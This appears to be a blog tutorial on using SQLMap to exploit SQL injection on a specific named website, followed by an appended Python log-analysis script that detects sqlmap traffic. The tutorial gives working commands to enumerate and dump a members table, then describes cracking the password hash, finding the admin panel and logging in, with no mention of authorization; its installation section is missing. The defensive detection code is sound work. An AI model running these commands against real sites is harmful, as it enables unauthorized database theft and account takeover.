SQLMap

SQLMap is a tool used to detect SQL injection vulnerabilities and gain access to the database by exploiting these vulnerabilities. Now let's take a look at how it is used.

Our target site -> How to link to our articles

SQLMap Installation

Before moving on to its use, let's briefly show the SQLMap installation.
-u: This parameter refers to the URL. After the -u parameter we enter the URL we want to be scanned.
--tables: If the scan is successful, we want it to print the tables in the database it obtains.
--answers="*": We answer yes to all questions.
After the scan, we found the tables. There is a striking table here, the members table. Now let's look at the columns in this table.

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --columns -T members

We use the --columns parameter to see the columns in the table. The -T parameter means table; next to it we write the table whose columns we want to see.

We use --dump instead of --columns to see the data inside the columns.

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --dump -T members

Now that we have a hashed password and username, let's try to crack the hash. By chance, I managed to crack the hash using the "Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online" site. I type admin at the end of the target URL and by chance I find the admin panel. All that remains is to log in using the password and username. And I'm inside.

That's all I had to say. I hope it was a useful topic. By the way, sqlmap is a matter of luck; it doesn't work every time, you need to have some luck.
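Seen from the server side, the scan described above leaves a recognizable trail in the web access log. The following is an added example, not part of the original post: a small Python log check that flags requests where the numeric id parameter carries non-numeric or SQL-looking content, or where the client announces itself as sqlmap. The log lines, IP addresses, sqlmap version string and the NUMERIC_PARAMS set are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Jan/2024:10:00:01 +0000] "GET /cat-articles/linking-info.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Jan/2024:10:02:11 +0000] "GET /cat-articles/linking-info.php?id=7%20AND%204821%3D4821 HTTP/1.1" 200 5120 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '198.51.100.23 - - [10/Jan/2024:10:02:12 +0000] "GET /cat-articles/linking-info.php?id=7%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 4890 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Generic SQL fragments that should never appear in a plain numeric parameter.
SQL_TOKENS = re.compile(
    r"union\s+(?:all\s+)?select|\b(?:and|or)\s+\d+\s*=\s*\d+|sleep\s*\(|information_schema|--|'",
    re.I,
)
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects to be integers


def inspect(line):
    """Return (client_ip, reasons) for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = set()
    if "sqlmap" in m["ua"].lower():  # default sqlmap User-Agent; the client can change it
        reasons.add("sqlmap user-agent")
    # parse_qsl percent-decodes values, so encoded payloads are checked in clear form.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not value.isdigit():
            reasons.add(f"non-numeric {name}")
        if SQL_TOKENS.search(value):
            reasons.add(f"SQL syntax in {name}")
    return (m["ip"], reasons) if reasons else None


def summarize(lines):
    """Group the findings by client IP."""
    hits = {}
    for found in filter(None, map(inspect, lines)):
        hits.setdefault(found[0], set()).update(found[1])
    return {ip: sorted(reasons) for ip, reasons in hits.items()}


if __name__ == "__main__":
    for ip, reasons in summarize(SAMPLE_LOG).items():
        print(ip, reasons)
```

Because the User-Agent header is under the client's control, the parameter checks are the more reliable signal; the lasting fix is a parameterized query for id and a salted, slow password hash for the members table.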